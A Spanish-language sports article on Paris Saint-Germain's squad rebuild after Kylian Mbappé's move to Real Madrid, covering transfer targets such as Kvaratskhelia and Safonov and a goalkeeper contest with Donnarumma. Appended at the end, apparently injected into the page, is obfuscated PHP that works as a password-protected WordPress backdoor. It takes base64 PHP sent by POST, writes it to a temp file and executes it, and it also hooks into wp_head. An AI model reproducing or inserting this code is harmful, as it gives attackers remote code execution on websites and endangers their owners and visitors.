El PSG renace sin Mbappé

El club ya no piensa en el nuevo jugador del Real Madrid y cincela el nuevo proyecto, centrado en reforzar el colectivo y no el talento individual.

France’s forward #10 Kylian Mbappe looks on during the International friendly football match between France and Canada at the Matmut Atlantique stadium in Bordeaux, on June 9, 2024. (Photo by FRANCK FIFE / AFP) (Photo by FRANCK FIFE/AFP via Getty Images)

El Paris Saint-Germain no quiere saber nada más de Kylian Mbappé, nuevo jugador del Real Madrid, con el que la relación se ha ido deteriorando desde que confirmó, en una reunión con Al Khelaïfi en febrero, su salida del PSG en junio. El club no le ha dedicado ni un mensaje en las redes sociales, ni tampoco un homenaje en el Parque de los Príncipes, denotando que a Al Khelaïfi le sentó muy mal que se fuera gratis.

La hoja de ruta, ahora, del conjunto parisino es reforzar el colectivo para no cometer el mismo error que con Mbappé en su renovación de 2022, cuando puso al jugador por encima de la institución, desencadenando un tira y afloja entre ambas partes que ha culminado con su salida a coste cero en junio. Luis Enrique, también Al Khelaïfi, han repetido el mismo mensaje durante las últimas semanas, a Mbappé se le suplirá con fichajes, pero el jugador es insustituible.

Los primeros nombres para reforzar al PSG ya aparecen en el horizonte. El primero es Sáfonov, guardameta del Krasnodar y de la selección rusa, con el que el club llegó a un acuerdo la semana pasada por un montante que asciende a 20 millones de euros, bonus incluidos. Desconocido para el mundo del fútbol, su fichaje podría darle competencia a Donnarumma, titular indiscutible en la portería durante las últimas dos temporadas.

Aunque la nómina de nombres para reemplazar a Mbappé es enorme, la realidad es que el PSG quiere cerrar, antes de pensar en otros perfiles, la incorporación de Khvicha Kvaratskhelia. El georgiano, de 23 años, llegó a un acuerdo con la entidad parisina, pero el principal obstáculo sigue siendo el Nápoles, intransigente a la hora de negociar y que pide, en primera instancia, un precio de 130 millones de euros, mientras que el PSG le valora en 60.

Además del todavía futbolista napolitano, Rafael Leão y Osimhen también han sido monitorizados por el PSG, pero antes de entablar conversaciones con sus respectivos clubes, Milan y Napoli, el actual campeón de la Ligue 1 se centra en el fichaje de Kvaratskhelia. También ha sonado Rayan Cherki, mediapunta del Olympique de Lyon, un diamante en bruto, aunque no termina de explotar, con el que Luis Enrique estaría encantado. París se prepara para un mercado agitado.

Donnarumma ya no es intocable

Gianluigi Donnarumma podría vivir un déjà vu en París, después de que el Paris-Saint Germain cerrara la incorporación del guardameta Sáfonov, 25 años, del Krasnodar. Luis Enrique quiere que, a partir de la próxima temporada, sus tres guardametas, el italiano, el ruso y Arnau Tenas, compitan por un puesto en el once titular, una situación similar a la que acaeció en la capital francesa en la temporada 2021-2022, cuando Keylor Navas y Donnarumma alternaron las titularidades bajo palos.

Como bien reiteró Luis Enrique a lo largo de la temporada pasada, el objetivo del PSG es que todos los jugadores de la plantilla, incluidos los porteros, se sientan titulares, por lo que el técnico asturiano, de 54 años, no hará ninguna concesión a Donnarumma. El hecho de haber desembolsado 20 millones, bonus incluidos, por Sáfonov, portero titular de la selección rusa, unido al potencial de Arnau Tenas, desembocará, en verano, en una lucha entre los tres cancerberos por hacerse con la titularidad, aunque el napolitano, indiscutible, parta con ventaja.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}